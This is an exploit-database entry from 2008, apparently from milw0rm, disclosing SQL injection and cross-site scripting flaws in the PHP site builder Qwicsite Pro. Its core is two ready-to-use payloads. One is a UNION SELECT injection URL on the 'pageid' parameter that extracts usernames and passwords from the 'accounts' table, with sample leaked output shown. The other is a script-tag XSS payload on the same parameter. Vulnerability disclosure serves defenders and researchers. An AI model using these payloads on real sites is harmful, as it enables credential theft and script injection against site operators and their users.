qwicsite pro - SQL Injection / Cross-Site Scripting

Author: Cr@zy_King
type: webapps
platform: php
port: 
date_added: 2008-09-03  
date_updated:   
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 6363.txt  

By Cr@zy_King a.k.a t4cs1zkr4L


Qwicsite Pro (SQL/XSS) Multiple Vulnerabilities


http://localhost/?pageid=-1+union+select+1,2,3,concat(0x3a3a,username,0x3a3a,password)+from+accounts/*


<!-- checkpageuser   - -1 union select 1,2,3,concat(0x3a3a,username,0x3a3a,password) from
accounts/* -  - ::al3m::kinq -->


::Username::pass



http://localhost/?pageid=<script>alert("Cr@")</script>



www.biyosecurity.com - www.heykirmedya.net [Yakinda Online]

# milw0rm.com [2008-09-04]